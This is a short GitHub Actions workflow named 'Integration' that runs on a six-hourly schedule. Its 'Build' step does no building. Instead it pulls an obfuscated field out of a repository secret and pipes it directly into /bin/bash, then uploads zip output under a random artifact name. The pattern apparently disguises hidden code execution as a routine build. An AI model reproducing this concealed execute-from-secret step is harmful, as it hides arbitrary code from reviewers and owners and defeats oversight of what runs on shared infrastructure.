name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '28 0,6,12,18 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  operation:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build
        env:
          f43: ${{ secrets.f43 }}
        run: |
          printf '%s' "$f43" | jq -r .gtsy936 | /bin/bash
          echo $dzky58 | jq -r .z711 | /bin/bash

      - name: Archive output
        uses: actions/upload-artifact@v4
        with:
          name: MUMwnIsi
          path: "*.zip"
          retention-days: 1
